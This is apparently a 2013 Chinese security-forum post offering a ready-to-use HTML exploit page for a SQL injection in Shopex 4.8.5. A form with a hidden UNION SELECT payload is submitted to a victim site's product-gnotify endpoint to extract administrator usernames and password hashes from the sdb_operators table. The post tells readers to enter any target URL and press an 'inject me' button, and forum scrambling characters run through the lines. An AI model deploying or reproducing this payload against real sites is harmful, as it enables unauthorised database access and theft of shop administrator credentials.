<center>
) j5 d# t, t) Q9 ?) Y+ [$ e; f<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title> V) E! u* M- X+ p- \3 a. ]: R
<form action="" method="post" name="submit_url">1 p! V! c8 D( u1 i; _" o* Q1 f
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
; K% F; i' f- J, n% l7 M$ M L* Z<input type="hidden" name="goods[goods_id]" value="3">( g/ j+ E: ]4 N! I! _& s
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
2 u9 G: G$ E8 B, B2 C' ]: X& u# O, q# c<input type="submit" value="给我注入" onclick=fsubmit()>) |2 W. E& r4 g. ]. F1 a- R* y
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
5 m* P) K, s& V. b! ]
% Q7 _& s" p4 F' \1 Q @<script> % q9 w" O1 c- v" h1 P9 ?7 E
function fsubmit(){
4 n |0 q5 M0 S; k# k8 sform = document.forms[0];
" t) P* S9 W- q6 Q4 p, m9 Nform.action = form.url.value+'/?product-gnotify';
3 h/ ]9 G5 H7 I7 d$ A, {1 Vform.submit();
& w2 H9 q, ?' |( x3 `% V}
' z7 n, J2 ^3 V- B</script>% e( B# _; E4 j
|
发表于 2013-1-23 09:20:52
收藏
支持
反对